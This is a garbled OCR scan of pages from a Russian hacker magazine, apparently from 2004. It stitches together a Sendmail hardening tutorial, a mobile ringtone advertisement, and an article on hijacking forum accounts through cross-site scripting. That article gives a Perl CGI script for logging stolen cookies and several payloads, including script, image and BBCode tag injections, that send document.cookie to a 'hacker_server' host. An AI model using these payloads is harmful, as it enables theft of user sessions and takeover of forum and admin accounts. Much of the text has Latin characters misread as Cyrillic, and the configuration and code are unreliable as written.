$.Ьу (Хакер)$?г иіііі $г$.$?{гіаетоп_(атіІу}/${с1аетоп_(аті- 
Іу}$. і(і $і$?{ІІз_ѵегзіоп} 

(изіпд ${Из_ѵегзіоп} иіііі сірііег ${сір!іег} (${сір!іег_ЫІз} Ьііз) 
ѵегіііей ${ѵегі(у})$.$?и 
(ог $и; $.$Ь$?д') 

Приведу текстовый скриншот получивше- 
гося хедера: 

Кесеіѵеі (гот ап4гизбоск@с)отаіп.пе1 
Оу тШаУотаіішІ (Місііап) иіііі ЕЗМТР/іпеІ Ій 
ШМкЮВОМ 

(изіпд ПйШѵЗ иіііі сірііег 0НЕ-0$$-АЕ$256-$НА (256 ЬІІ$) 
ѵегіііей N0) (ог <апі!гизІіоск(1>геаІ.хакер.ги>: Моп, 8 Рее 2003 
01:46:55 +0300 (М5Ю 
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Л РПЗРУПИВПЕИ ДОСТУП 

Начиная с версии 8.9 открытая ретрансляция 
запрещена по умолчанию. Это значит, что 
только с локального узла можно отправлять 
почту. С помощью средства изе сѵѵ іііе и фай- 
ла /еіс/таіі/іосаі-іюзі-патез задаются клиен- 
тские машины и домены, для которых наш 
хост будет принимать и доставлять почту: 

ЕЕАТІЩіііе.М.ЕІІе) 

# ѵі /еІс/таіІ/ІосаІ-Ііо$1-пате$ 

тііііаліотаіп.леі 

йоліаіп.леі 

Идентифицировать наших клиентов по ІР- 
адресу и заблокировать всю поступающую 
почту от сомнительных товарищей/доме- 
нов/подсетей можно с помощью директивы 
ассеззфЬ и базы доступа /еіс/таі І/ассезз : 

ЕЕАШКЕ(ассе55_йЬ) 

К ѵі /еіс/таіі/ассезз 
192.168.131 ВЕІАУ 
192.168.158 КЕЕАѴ 

аікІІІ$_(ІерШапкег$таіІ.сот РІЗСАКР 
зргау.зе 550 $1ау о(І ту таіізегѵег! 

В первых двух примерах принимаем для 
последующей пересылки почту из указанных 
подсетей, в третьем отклоняем все письма 
от аисіііз бері@ЬапкегзтаіІ.сот без уведом- 
ления об ошибке (зачем предоставлять спа- 
мерам какую-либо информацию?) и выдаем 
сообщение об ошибке «Держись подальше 
от моего почтовика» с кодом состояния дос- 
тавки 550 на любое письмо из домена 
зргау.зе. После каждой модификации файла 
/еіс/таіі/ассезз нужно перестраивать бина- 
рик с хешированной базой данных: 

# такетар Ішіі /еіс/таіі/ассезз < /еіс/таіі/ассезз 

Не сомневайся, никакой опечатки здесь 
нет - к имени результирующего файла прог- 
рамма такетар автоматически добавит 
суффикс «.ЙЬ». Точно такое разграничение 
доступа, только для локальных юзверей, 
можно организовать с помощью черных 
списков: 

ЕЕАТІ)ЩЫаскІІ5(_гесіріелІ5) 

# ѵі /еіс/таіі/ассезз 

ішсрі? 550 Аге уои оп 6гид$? N 0 таіі (ог изег ішср 



СѴШ ШОР 



А СКОЖИ СППНУ НЕТ! 

Спамеры также не остались в стороне. Спе- 
циально для них известный программист Пол 
Викси заготовил оперативный список «черных 
дыр» (РВЕ - Веаіііте ВІаскИоІе Ійзі). После 
включения следующих трех строк в файл кон- 
фигурации, ЗепсІтаіІ будет делать запросы на 
общедоступные ВВІ_-серверы для проверки 
адресов, с которых приходят письма: 

ЕЕАТЩ'ЛгсЫ', 'зЬЕзратііаиз.огд 1 , Трат Ыоскесі 1 ) 
ЕЕАТІІЩ'іМГ, 'ШіЫ.огд 1 , '550 Етаіі геіесЕегі 1 ) 
ЕЕАТІЩ'іМГ, ’геіауз.огсІЬ.огд', '550 Етаіі гфсІмГ) 

Макросы ЮСАиХЖЮ и ЮСАШШЗЕГЗ 
подключают механизм проверки заголовков, 
позволяя тем самым обеспечить дополнитель- 
ную защиту от вирусов, червей и спама. При 
таком раскладе каждое принятое письмо 
ЗепсІтаіІ будет парсить по заданным правилам 
фильтрации. Следующие два фильтра взяты 
мной для примера из шаблона кпесМ.тс: 

ЮСАЕ.СОІІЕІС 

Ксбескасісігезз гедех -аШТСН 

л ([0-9]+<@(ао1|тзп)\.сот|[0- 

9][ л <]*<@)ипо\.сот|.{20}[ л <]*<(®ао1\.сот)\.?> 

ЮСА1_К1ЛЕ$ЕТ5 

ОЩРаЦІЮѴЕѴОО 

0{ІЕМ5д}Т(іІ5 теззаде тау сопіаіп Іііе ІЕОѴЕѴОи ѵігиз 

В первом случае отклоняем почту от поль- 
зователей с числовыми именами из доменов 
аоі.сот, тзп.сот и щпо.сот, а во втором 
письма, зараженные вирусом ІІоѵеуои. 

Л тонкая настройко 

Отключаем все поддерживаемые протоколы, 
кроме 8МТР: 

ЕЕАТИЩпошіср, 'гфсі 1 ) 
шиІеЛпеГ ииСР_КЕІАѴ) 
шкМпеСВІТЩЕЕАѴ) 
ілкМпеСВЕСІЩЕІАѴ') 

Запрещаем передавать ответы на провер- 
ку и раскрытие адресов (статусные 5МТР-ко- 
манды ЕХРИ и ѴВРѴ), ограничиваем локаль- 
ным пользователям просмотр и обработку 
очереди сообщений, а также при ошибке 
доставки не высылаем отправителю тело со- 
общения: 

8еЕіпе('сопЕРРІѴАСѴ_ЕЕА65 І , 'аиіімагпіпда, поехрп, поѵгіу, 
пеегітаііііеіо.гезігісітаіід.гезігісідгип.поьосіугеіигп') 

Отвергаем письма, не соответствующие 
почтовым стандартам: 

■ ». 



П о умолчанию некоторые установки ЗепсІтаіІ’а настолько 
строги, что их при необходимости следует ослаблять. Так, 
например, чтобы разрешить серверу Сугиз ІМАР обращаться к 
базе данных пользователей, аутентифицирующихся с помощью 
механизма 5А5Ц нужно в «.тс» файл добавить следующие 
записи: 

МіпеГсопйОІІТДАМЕТЕІММАІЕ 1 , 'бгоирІЫаЬІеШЛВЕіІе') 
сІеЕіпе('сопЕЕОСАЕ_МАІЕЕР', ’сугиз') 

МАИЕКЕсугиз) 



іІеЯпеСсопШАХ.НЕАВЕКВ.ІВІбТН 1 , Ч6384 1 ) 

йе(іпе('соп(МАШМЕ_НЕАОЕВ_ЕЕШН , 1 '256/128') 

Задаем в байтах максимальный размер 
принимаемого сообщения (по умолчанию 
размер не ограничен, что не есть хорошо): 

(Іе(іпеГсопШАХ_МЕ55А6Е.5І2Е', '2097152') 

Определяем максимальное число получа- 
телей для одного письма: 

8е(іпе('соп(МА)і_ВСРТ$_РЕК_МЕ55А6Е І І '10') 

Если получатель не существует, то в сооб- 
щении об ошибке генерируем дополнитель- 
ный заголовок: 

беЕіпеГсопІШСРТІСТІОЕГ, ’айіНо-ипгіІзсІозеіІ 1 ) 



■>н- 

л На диске лежат 
свежие версии 
розйіх, зепсітаіІ и 
ЯтаіІ (хотя там со 
свежачком тяжело). 




^ѵм/ѵѵ.зепсітаіі.огд/ 

лшт. зепсітаіІ. огд/ 

-дзИаріго/ 

л зепсітаіІ. Ьу.ги/ 

зепсііір.іііті 

^ѵѵѵѵѵѵ.сіаррег.огд/ 

Ьтс/с1осз/5епс1таН- 

сіігооШті 

л зоигсе^огде.пеѴ 

ргоіесіз/зепсітаіі-зді/ 



Дублируем на специально заведенный акка- 
унт сообщения, которые не удалось доставить: 



(МіпеСсопІСОРѴ.ЕШКНО 1 , 'розітазіег') 




Перестаем принимать почту до тех пор, 
пока не будет высвобожден требуемый объ- 
ем (в данном случае 1 Мб) свободного мес- 
та в файловой системе, содержащей оче- 
редь сообщений (как правило, раздел /ѵаг): 

(ІеІіпеСсопШ.РКЕЕ.ВШСКЗ', '1024') 

А ОТБИВНЕМ 005-ПТПКИ 

Каждый раз, принимая от удаленного хоста 
запрос на ЗМТР-соединение, ЗепсітаіІ по- 
рождает новый экземпляр самого себя. Нет- 
рудно догадаться, что такое поведение де- 
мона - лакомый кусочек для злоумышленни- 
ков. Поэтому для ограничения максимально- 
го количества одновременно іогк’нутых про- 
цессов предусмотрен макрос МАХ РАЕ- 
МОКІ СНІШВЕІ\І: 
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записи мх 







— 



КПКЕР/№03(63)/2004 




(ІеЯпеСсопШ.ВАЕМОН.СНРВЕН'.'гУ) 

А общее число входящих подключений по 
протоколу 5МТР можно ограничить вот та- 
ким правилом брандмауэра (на примере 
раскеі Шег): 



Ь. 



З начительную роль в работе любого МТА играет доменная 
система имен, так как записи МХ помогают транспортным 
агентам выбирать наиболее эффективный маршрут для пере- 
дачи сообщений: 



# ѵі /ѵаг/патей/тазіег/сіь.сіотаіп.пеі 



1(1 N5 пз.гіотаіп.пеі. 



йотаіп.пеі ІЯ МХ 10 

ІЯ МХ 20 тісііап.сіотаіп.пеі 



пз.гіотаіп.пеі. 



раз; іи оп $ех!_ІІ іпеі ргоіо іср (гот апу Іо апу рогі $т!р Пара 
$/$А кеер зіаіе (тах 100) 

СОММЕСТЮКІ ВАТЕ ТИРСШІЕ - это еще 
одна директива, предназначенная для предо- 
твращения атак вида «отказ в обслужива- 
нии». С ее помощью можно установить лимит 
на число допустимых соединений в секунду: 



0е(іпе('соп(С0ЩСТІ0ЯІАТЕ.ТНІІ0ТТІЕ','5 І ) 



А коипн 

БУДЕТ 




Макрос МАЗОІІЕВАОЕ АЗ предназначен для 
того, чтобы вся исходящая почта выглядела 
отправленной из одного домена, а не с от- 
дельных клиентских хостов (почтовый адрес 
отправителя ц$ег@Ііо$1.сІотаіп.пеІ будет пе- 
реписываться на изег@с!отаіп.пеІ): 



еЕЯЕШСЗ_РОМАШ( ' тігііап.гіотаіп.пеі 1 ) 
ЕХР03Е0_ІІ5ЕК( ' гооГ.' Маііег-Ваетоп') 
МАЗОІІЕРАРЕ_АЗ(гіотаіп.пеІ) 
ЕЕАТітЕІаІІтаздиегагіе) 
РЕАТІШЕ(таздиегагіе_епѵеІоре) 



Существуют разные способы почтового 
маскарадинга, однако директивы аіітаз- 
циегасіе и та$циегасІе_епѵеІоре рекомен- 




ПОДДЕРЖКР РУССКОГО В ЗЕИОМПИ 



О бучаем ЗепсітаіІ понимать великий 
и могучий: 

гіе(іпе('соп№ЕР_СНАІІ_5ЕТ І , 'коі8-г') 
гіеІіпе('соп(5ЕѴЕЯ_ВІІ_ІЯР11Т', Еаізе) 
гіеІіпеСсопШбНТ.ВІТ.НАЯРПМб 1 , 'раззв') 



С помощью значений из диапазона 0... 65535 задаются приори- 
теты почтовых серверов (чем меньше приоритет, тем предпоч- 
тительнее сервер). 



дуется использовать вместе - тогда все 
адреса в заголовках и конвертах писем бу- 
дут маскироваться одинаково. Если один 
домен обслуживают несколько почтовых 
концентраторов, то, чтобы впоследствии 
легче было выяснить, с какого из них по- 
лучено сообщение об ошибке, имеет 
смысл с помощью макроса ЕХР08ЕР ІІ5ЕВ 
исключить из процесса маскировки поль- 
зователей гооі и Маііег-Раетоп. 

А ТИШЕ ЕДЕШЬ, ДОЛЬШЕ БУДЕШЬ 

Один из главных недостатков ЗепсітаіІ’а - 
это довольно низкая скорость работы по 
сравнению с основными конкурентами 
(РозКіх, ОтаіІ и Ехіт). Но зачастую винов- 
ником медлительности почтовой системы 
становится не сама реализация транспорт- 
ного агента, а некомпетентность систем- 
ного администратора. К примеру, многие 
после установки дистрибутива обнаружи- 
вают открытый 587/Іср порт, затем с не- 
доумением выясняют, что он принадлежит 
ЗепгітаіІ’у, и с мыслью «чем меньше пор- 
тов открыто, тем секьюрнее» отказывают- 
ся от агента подачи, который как раз за- 
нимается распределением нагрузки и по- 
вышением общей производительности 
почтового сервера. Если по незнанию ты 
поступил так же, то следующие записи в 
«.тс» файле помогут восстановить работу 
агента подачи почты: 

ВАЕМОЯ_ОРТІОЯ5('РатіІу=іпеІ, агігіге$$=0.0.0.0, №те=МТА') 

ОАЕМОЯ_ОРТІОШалііІу=іпеІ аМгеяШ.0.0.0, РоП=587. 

Яате=М8А, М=Е') 

СЕІЕЯТ_0РТІ0Я8Г РатіІу=іпеІ, Агігіге$5=0.0.0.0') 

Запретив аутентифицировать отправителя 
письма с помощью демона ісіепісі, мы смо- 
жем уменьшить время подключений 
ЗепсІтаіГа на 5 секунд: 

гіеІіпеГсопШШЕЯТ'/О 1 ) 

Если вся исходящая почта будет пересы- 
латься через главный почтовый концентратор, 
то можно обойтись без резолвинга локальных 
адресов и обращения к РМЗ-серверу: 

ЕЕАШЕСпосапопКу 1 ) 

гіеІіпе('$МАРТ_Н08Т', 'атір: 192.168.0.7 1 ) 



Г 

А ГРУЗИИ ДЕМОНП ПО полной 

В каждой системе процессы сборки «.тс» 
файла, компиляции и запуска ЗепсітаіІ’а 
происходят по-разному, соответственно, ни- 
чего, кроме совета ознакомиться с прилага- 
ющейся документацией, я дать не могу. В 
общем случае вся процедура выглядит сле- 
дующим образом. Сохраняем копию рабоче- 
го конфига: 




К ср /еіс/таіі/зепгітаіі.сі /еіс/таіі/аепгітаіі.сі.огід 

Находясь в каталоге с файлам и -шаблона- 
ми, генерируем новый зепсітаіІ. сі: 

# т4 ,./т4/с(.т4 тігііап.тс > /еІс/таіІ/$епгітаіІ.с( 

Запускаем ЗепсітаіІ в режиме демона: 

# /изг/зЬіп/зепгіілаіі Ч ш-тіа -М -цЗОт 

К сгопІаЬ -е 

*/30 

# /изг/зЬіп/зепгітаіІ Ч зт-тзр-диеие -Ас ^ 

И проверяем корректность загрузки: 

К ІаіІ /ѵаг/Іод/таіІІод 

А МЫЛЬНЫЕ ПОСТСКРИПТУМЫ 

Как говорил Козьма Прутков, нельзя объять 
необъятное. К сожалению, эта статья не 
исключение, и многое осталось за бортом: 
аутентификация через ЗАЗЕ, обеспечение 
конфиденциальности передаваемых сооб- 
щений с помощью протокола ИЗ, помеще- 
ние демона в ІаіІ, плюсы и минусы запуска 
из іпеігі, работа с іср ѵѵгаррегз, програм- 
мирование с использованием МІІІег АРІ, 
подключение антивирусов и антиспамерс- 
ких утилит. Так что если будут вопросы - 
пиши, по возможности отвечу. 25ЕІ 
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шмщ 

щшщу 

/ N 

1. Напишите 5М$-сообщение с кодом логотипа, картинки или мелодии, 
которую Вы хотите получить, например ХА 1234567 

2. Отправьте 5М5-сообщение на номер: 

000700 - если Вы абонент МегаФон (ОАО Зопіс Оио) 

8181 - если Вы абонент Билайн (ОАО "Вымпелком") 

8181 - если Вы абонент МТС (Теіесот XXI), только в Санкт-Петербурге 

3. Заказанный Вами логотип, картинка или мелодия будет выслан на 
Ваш мобильный телефон. 

Стоимость мелодии составляет $0.85 (без учета налогов) и будет 
включена в Ваш счет за услуги мобильной связи. Учитывается каждое 
отправленное Вами сообщение. Услуги предоставляются для абонентов 
"МегаФон" Москва и "Билайн" Москва. 

Список городов для "Билайн”: Москва, Брянск, Владимир, 

Иваново, Калуга, Кострома, Рязань, Смоленск, Тверь, Тула, Ярославль, 
^Белгород, Воронеж, Курск, Липецк, Орел. 



СОВМЕСТИМОСТЬ ЛОГОТИПОВ 

Иокіа: 2100, 3210, 3310, 3330, 3410, 
3510, 3510І, 3530, 3610, 3650, 5100, 
5110, 5210, 5510, 6100, 5510, 6100, 
6110, 6130, 6150, 6210, 6220, 6250, 
6310, 6310І, 6510, 6610, 6800, 7210, 
7250, 7650, 8210, 8310, 8810, 8850, 
8855, 8890, 8910, 9110, 9110І, 9210, 
9210І. 

N600/620, Т100, А400 



СОВМЕСТИМОСТЬ КАРТИНОК 

Иокіа: 2100, 3210, 3310, 3330, 3410, 
3510, 3510І, 3530, 3610, 3650, 5210, 
6210, 6310, 6310І, 6510, 7250, 7650, 
82x0, 8310, 8850, 8855, 8890, 8910, 
9210І. 

5ат$ипд: С100, Р400, А400, N620, 
5100, 5300, Т100, Т400, Т500 

СОВМЕСТИМОСТЬ МЕЛОДИЙ 
Иокіа: 3210, 3310, 3330, 3410, 3510І, 
3530, 3585, 3610, 3650, 5100, 5210, 
5510, 61ХХ, 6210, 6310, 6310І, 6510, 6610, 
6650, 6800, 7210, 7250, 7650, 82x0, 
8310, 8810, 8850, 8855, 8890, 8910, 
8910І, 9110, 9110І, 9210, 9210І. 
Вапиііпд: А400, 5100, Т100, Т400, 
Т500, Ѵ200 



По всем вопросам обращаться по 
е-таіі: $аІе$@5тхі1.ги, 



ПЯѲП7 пятаго пятаго пятаго пятаго пятаго пятаго пятаго пятаго пятаго 



Код мелодии Название мелодии 


Исполнитель 


Код мелодии Название мелодии 


Исполнитель ^ 


ХА 31597 


Вгіпд Ме То І_ІГе 


Еѵапезсепсе 


ХА 60099 


Зеппу Ггот ТГіе ВІоск 


ЗеппіТег Ьорег 


ХА 8487 


Вгоѵѵп Еуеб СігІ 


Ѵап Моггізоп 


ХА 60170 


Бабу Магтаіабе 


СЛгізІіпа Адиііега 


ХА 60197 


СаІІІпд 


Сегі НаІІІѵѵеІІ 


ХА 60147 


Мое сердце 


Сплин 


ХА 60127 


Ех-СігІГгіепсІ 


N 0 ОоиЬі 


ХА 60081 


ѴѴкіо І_еГ ТНе 0од5 ОиГ 


ВаЬа Меп 


ХА 60145 


Филини 


Сплин 


ХА 75049 


Реоріе Аге ЗТгапде 


ТГіе Ооогз 


ХА 75064 


ѴѴНепеѵег, ѴѴНегеѵег 


ЗНакіга 


ХА 60191 


Ріпк РапФег ТНете 


Непгу Мапсіпі 


ХА 60122 


Ргаддіе Коек 


ТПе МирреГз 


ХА 31953 


Под испанским небом 


Агіапа 


ХА 60087 


Со БеИТОиТ 


Оазіз 


ХА 60143 


Лопковник 


Би-2 


ХА 60203 


Неаб Оѵег Гееі 


АІапіз Могіззейе 


ХА 60148 


Попытка №5 


ВиаГра 


ХА 60139 


Неу ВаЬу 


N 0 ОоиЬі 


ХА 60144 


Серебро 


Би-2 


ХА 60098 


1 Ат Міпе 


РеагІ Загп 


ХА 60128 


5Гіе'$ Тііе Опе 


РоЬЬІе ѴИІІатз 



51 60204 Ігопіс 



АІапіз Могіззейе 



ХА 60166 51:гапдег$ іп Фе підМ 



Ггапк ЗіпаТга^ 



• • 




Картинки 



Логотип Код логотипа 


Логотип Код логотипа 


Логотип 


Код логотипа ^ 


ХА 77000 


ІФВЕЕП ХА 77022 


(Г/ Т'ТІ". '"' *й ХА 77044 


ХА 77001 


Н ф П И В П ХА 77023 


ХА 77045 


іи* > " ХА 77002 


-—*-*-* ХА 77024 


'І’ІЗ'ЛІ-ІТ.ІМІ ХА 77046 


„ (ГзѴ-*. ■ - ХА 77003 


НИДкН ХА 77025 


ЯОКОНОП-В: ХА 77047 


ИГІД ХА 77004 


Н б 'й 1 ХА 77026 


ХА 77048 


ХА 77005 


рЛу/Щф&ф ХА 77027 


ХА 77049 


. ХА 77006 


МгЗгм?? ХА 77028 


ХА 77050 


І~і)ЕгХ.~4 ХА 77007 


5ЕХЗЕЕЭ ХА 77029 


ГпрпА.жіф ХА 77051 


ХА 77008 


яма ХА 77030 


ФК ЗЕНИТ ХА 77052 


ХА 77009 


МхУ.' ■ІЛѴІІ ХА 77031 


Г РПС5ТІ ХА 77053 


ШЯШШ ХА 77010 


ЯС'Т'-Л КАНТ ХА 77032 




ТШІ.Ж 


ХА 77054 


ХА 770,1 


^ * А ) ХА 77033 


ІШЖѴД ХА 77067 


Щ ШШ ХА 77012 


ХА 77034 






ХА 77058 


ХА 77010 


ІЕ.Ь.іІѵЖ ХА 77035 


ЕЕПГСВОНГ ХА 77059 


ИЬ-іЯлД ХА 77014 


^ , ХА 77036 


_ ь Т ^77— ХА 77060 


Гд и/ ХА 77015 


ГГТ ТВ? ХА 77037 


БЕІС ха 77075 


ХА 770,6 


- іОУ р,гт ХА 77038 


ЙІ-МАМ ХА 77076 


ХА 770,7 


ХА 77039 


^уті-ЧпЛН ХА 77077 


' ХА 77018 


ЦСКА ХА 77040 


Гм^иіміі ХА 77078 


ТІІГ'І^ІР ХА 77019 


ХА 77 °41 


Ді КГБ ХА 77093 


щЩкшфуф ХА 77020 


ФТС Рл гиф ХА 77042 


.ми той ХА 77094 


ХА 77021 


$ Б Ьі >■!-!•: ’'Уі ХА 77043 
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гозз-зііе зсгірііпд (С88/Х881 - это мощный инструмент, с помощью которого хакер может получать незаконный акцес к разным 
сетевым услугам: к чужим почтовым лщикам, аккаунтам на форуме, чатам и т.д. Особенность этой атаки заключается в том, что 
юзер ее вообще не почувствует, т.к. С88 не палит себя ни в файрволах, ни в антивирусах. О юзер догадается, что его учетную 
скоммуниздипи, только когда увидит появившиеся постинги от своего имени :). 



30ХВ0Т ПКШНТОВ ПРИ ПОМОЩИ С88 



Л в чем суть атаки? 

ежсайтовый скриптинг воз- 
можен лишь в тех случаях, 
когда удается встроить в 
веб-страницу опасный код 
на языке Иаѵабсгірі, ѴВЗсгірІ, 
Иаѵа, АсІіѵеХ и др. При этом 
сам код будет исполнен на 
стороне пользователя, прос- 
мотревшего эту веб-пагу. Для вставки своих 
скриптов хакер может воспользоваться 
диезІЬоок’ами, чатами и форумами. Однако 
уже давным-давно прошли те времена, когда 
можно было безнаказанно украшать свою 
мессагу в чатах и форумах любыми тегами. 

В современных скриптах форумов фильтры, 
обрабатывающие введенный пользователем 
текст, всячески препятствуют вставке потен- 
циально опасного содержимого, но об этом 
мы поговорим чуть позже. 

Что же можно делать с юзером, испол- 
нившим на своей тачке ИаѵаЗсгірі-код? С 
помощью іаѵазсгірі’а можно сделать практи- 
чески все что угодно: начиная от определе- 
ния цвета Ьаскдгоипб’а на странице и закан- 
чивая многочисленными способами насолить 
пользователю. А если еще задействовать 
и уязвимость в браузере, то атакующий смо- 
жет даже выполнять команды операционной 
системы на компе пользователя. Кроме того, 




внедрив ДаѵаЗсгірІ: в форум или чат, хакер 
может получить доступ к текущей учетной 
записи пользователя. 

.і кок же захватывают 

ПККПУНТЫ.ИСПОПЬЗУЯ 

ЗПІІП8СВІРІ? 

Чтобы юзеру не приходилось набирать па- 
роль каждый раз, когда он заходит в форум, 
разработчики придумали систему авториза- 
ции через соокіе. Сессия, которая генериру- 
ется из логина и пароля пользователя, запи- 
сывается к юзверю на хард в текстовый фай- 
лик и помещается в папку С:\ОоситепІ$ апб 
ЗеИіпдз\имя пользователя\Соокіез. Каждый 
кукис маркируется доменом, т.е. скрипт, 
принадлежащий к одному домену, имеет 
доступ только к тем кукисам, которые были 
записаны скриптами этого домена. Так вот, 
когда юзер заходит на форум, скрипт запра- 
шивает кукис и проверяет, совпадает ли сес- 
сия, хранящаяся на винте, с сессией, кото- 
рая лежит в базе данных форума. И если 
они совпадают, то форум распознает юзера 
как законного пользователя аккаунта. 

Сам понимаешь, если хакер похитит дан- 
ные из этого кукиса юзверя и передаст их 
сервису как свои, то система распознает 
взломщика как реального пользователя! Так 
вот, в ИаѵаЗсгірі’е как раз имеются средства 
для чтения кукисов :). Поэтому, встроив тро- 



янский код, например, в сообщение на фо- 
руме, хакер получит доступ к кукисам юзве- 
рей, просмотревших его мессагу. А посколь- 
ку ИаѵаЗсгірІ поддерживается всеми совре- 
менными браузерами, то уязвимыми окажут- 
ся все пользователи... 

А ПРОЦЕСС ХИЩЕНИЯ СООКІЕ 

Что сделает хакер, чтобы спионерить соокіе? 
Сначала он подготовит сді-скрипт, который 
будет принимать данные из кукиса и сохра- 
нять их в файле. Как этот скрипт выглядит 
на регі’е: 



ПИШЕМ КУКИСЫ 



йі/изг/Ьіп/регІ -к 

# открываем файл соокіез.іхі для добавления инфы 
орел С00КІЕ5,"»../соокіе$.Іх1": 

ргіпі "Соліепі-Туре: 1ехІ/(іІтІ\п\п"; 

# добавляем в файл метку, благодаря которой можно 

# увидеть, тде начинается похищенный кукис 

ргіпі С00К1ЕЗ " леи соокіе \п"; 

К записываем переменную окружения 01ІЕКУ_ЗТКІкЕ, 

# содержащую параметры, передаваемые скрипту. 

К через которые хакер будет передавать данные кукиса 
ргіпі С00К1ЕЗ "ЗЕЩ'ОШ-ЗТШЫб'Лп"; 

К записываем в файл метку «конец кукиса» 

ргіпі С00К1ЕЗ " Ы о( соокіе \п\п"; 

К закрываем соокіез.іхі, записанная инфа сохраняется 
сіозе СООКІЕЗ; 
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Результат работы соокіе.сді 



пдмин фору ип или нота - тоже юзер 

П оскольку администратор форума/чата тоже пользуется бра- 
узером, он также подвержен уязвимости. Если админ прос- 
мотрит сообщение с опасным ДаѵаЗсгірІ-кодом, который отсы- 
лает его соокіе хакеру, то последний станет таким же админом, 
как и законный администратор. Хакер получит доступ к управ- 
лению всеми пользователями, сможет править чужие сообще- 
ния, просматривать ІР-адреса, с которых форумчане писали 
свои сообщения, банить и даже создавать новые разделы в фо- 
руме. Словом, сможет делать все, что предусмотрено админс- 
кой панелью управления... 



Итак, первый шаг выполнен. Теперь хакер 
получил скрипт, сохраняющий все, что ему 
передают через параметры. Скрипту будут 
передаваться данные из кукиса пользовате- 
ля, а сам скрипт, в свою очередь, будет их 
записывать в файл соокіез.Ш. В итоге в 
соокіез.М скопятся куки всех пользователей, 
просмотревших постинг в форуме или мес- 
сагу в чате с троянским скриптом. Теперь 
глянем на пример такого троянского кода: 

<$сгірІ>(1оситепІ.ІосаІіоп.Ііге?='ЩІр://Ііаскег_5егѵег/сді- 

Ьіп/соокіе.сді?' * (Іосшеп1.соокіе;</$сгірІ> 

В результате выполнения этого скрипта 
браузер сделает редирект на скрипт 
Шр://Ііаскег_5егѵег/сді-Ьіп/соокіе.сді. В параметрах 
ему передастся кукис пользователя. Соокіе- 
то будет похищен, но пользователь может 
заподозрить неладное: вместо ожидаемой 
страницы он увидит результаты работы 
скрипта соокіе.сді, т.е. пустую страницу. Тут 
уже от фантазии хакера зависит, каким об- 
разом он сможет скрыть результат работы 
своего скрипта. Хаксор может составить и 
другую конструкцию, которая, в отличие от 
предыдущей, вряд ли вызовет беспокойство 
у пользователя: 

<ІМ6 пате=туітд 

5гс="іаѵа5сгірі:сІоситеп1.туітд.5гс= І Шр://Ітаскег_5егѵег/сді- 

Ьіп/соокіе.сді?' * йоситепі.соокіе:"» 

Что же сделает браузер пользователя при 
обработке этой строки? Он создаст картинку 
с именем «туішд», ЕІРІ которой складывается 
из пути к скрипту соокіе.сді и данных кукиса 
юзера. Когда браузер попытается загрузить 
эту так называемую «картинку», скрипт соок- 
іе.сді через параметры получит кукис пользо- 
вателя и сохранит его в файле соокіе.м. 

Л встявшяігазшргя 

ВЧПТИПИФОРУМ 

Как я уже говорил, преобладающее 
большинство скриптов в форумах и чатах 



препятствуют вставке своих Мті-тегов в 
сообщение, заменяя символы «<» и «>» 
кодами этих символов < и > . 
Соответственно, если, к примеру, хакер 
вставит в свое сообщение строку 
«<8СВ1РТ></5СВ1РТ>», то, скорее все- 
го, она будет заменена на 
«<5СВІРТ> </5СРІРТ>»>. 
В итоге браузер выведет ее как простой 
текст; и его іаѵазсгірі, находящийся внут- 
ри этих тегов, не будет исполнен. Но для 
хакера это не проблема, т.к. есть еще 
несколько способов вставить іаѵазсгірі в 
мессагу. 

Как известно, в форумах при создании 
сообщения можно использовать специаль- 
ные теги, с помощью которых можно вы- 
делять свой текст цветом, вставлять кар- 
тинки, ссылки и др. Дело в том, что во 
многих форумах не фильтруются данные, 
прописывающиеся в этих тегах. С по- 
мощью тега [ІМС] можно украшать свое 
сообщение картинками. Например, тег 
[ІМ0]іііІр://пзсі.ги/ріс.Ірд[/ІМСі] вставит в 
сообщение ^(З’шку с адресом 
Шр://п$іі.ги/ріс.ірд. Хакеру ничто не мешает 
добавить в свое сообщение такую «кар- 
тинку»: [ІМС]іаѵазсгірі:аІегІ()[/ІМС]. Как 
понимаешь, такой «адрес» будет выдавать 
выскакивающее окошко вместо картинки 



всем, кто будет просматривать его сооб- 
щение. Подобный баг бывает и в других 
тегах. Например, тег «[соІог=дгееп" 
з1уіе=Ьаскдгоипсі-ітаде:игІ(іаѵазсгір1:аІегІ 
(сіоситепі. соокіе)) зІ2е="99]С55 ру- 
лит[/соіог]» не только выделит фразу «С35 
рулит» зеленым цветом, но и выведет в 
отдельном окне содержимое пользова- 
тельского соокіе. Есть еще один интерес- 
ный тег, с помощью которого юзер может 
вставлять ссылки в свои мессаги - это тег 
[ІІПЦ. Воспользовавшись тегом 
«[ІІНЕ=іііІр://пзсі.ги]НСД.ру[/ІІР1Ц», поль- 
зователь вставит в свое сообщение ссылку 
на пзсі.ги. Какой же может быть баг здесь? 
Если скрипт форума не фильтрует ІІЯЦ 
введенный пользователем на символ 
двойной кавычки, хакер может вставить 
іаѵазсгірі таким образом: 
[ІІЯІ_=1)ІІр://п5(1ги" опсііск=сіоситепІ.Іоса- 
ііоп.Ргеі=Мр://Раскег_зегѵег/сді-Ьіп/соок- 

іе.сді?'+гіоситепі.соокіе;іагдеі="_Ыапк]НС 

Д.ру[ДІЯЦ. Если жертва кликнет на ссыл- 
ку, то в новом окне загрузится главная 
страница пзсі.ги, а в старом выполнится ха- 
керский іаѵазсгірі. В нашем случае резуль- 
татом выполнения этого іаѵазсгірі’а будет 
редирект пользователя на скрипт хакера. 

В параметрах же самого редиректа пере- 
дадутся кукисы юзера. 




л Не стоит забы- 
вать, что все 
действия хакера 
противозаконны, 
поэтому статья да- 
на лишь для озна- 
комления и органи- 
зации правильной 
защиты с твоей 
стороны. За при- 
менение материа- 
ла в незаконных 
целях автор и ре- 
дакция ответствен- 
ности не несут. 
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С88 - опин из самых распространенных богов 










п ыра сгозз-зііе зсгірГіпд крайне популярна. В доказательство 


_ 




Ц этому приведу обзор СЗЗ-уязвимостей за одну неделю: 






Межсайтовый скриптинг в Рогит ѴѴеЬ Зегѵег - 


. ежэ ! 




ѵѵѵѵѵѵ.зесигі1уІаЬ.ги/42550.ІіітІ 

Межсайтовый скриптинг в ВВЗѴѴеЬѴѴеаѵег - 




ѵѵѵѵѵѵ.зесип1уІаЬ.ги/42496.Іі1тІ 






Межсайтовый скриптинг в ѴѴеЫодіс Зегѵег апсі Ехргезз - 






ѵѵѵѵѵѵ.5есип1уІаЬ.ги/42459.ИітІ 

Межсайтовый скриптинг и просмотр произвольных файлов в 


ІЬн^І 




ВгетзЗегѵег - ѵѵѵѵѵѵ.зесигіІуІаЬ. ш /42455. МтІ 


Т--Ч- - 




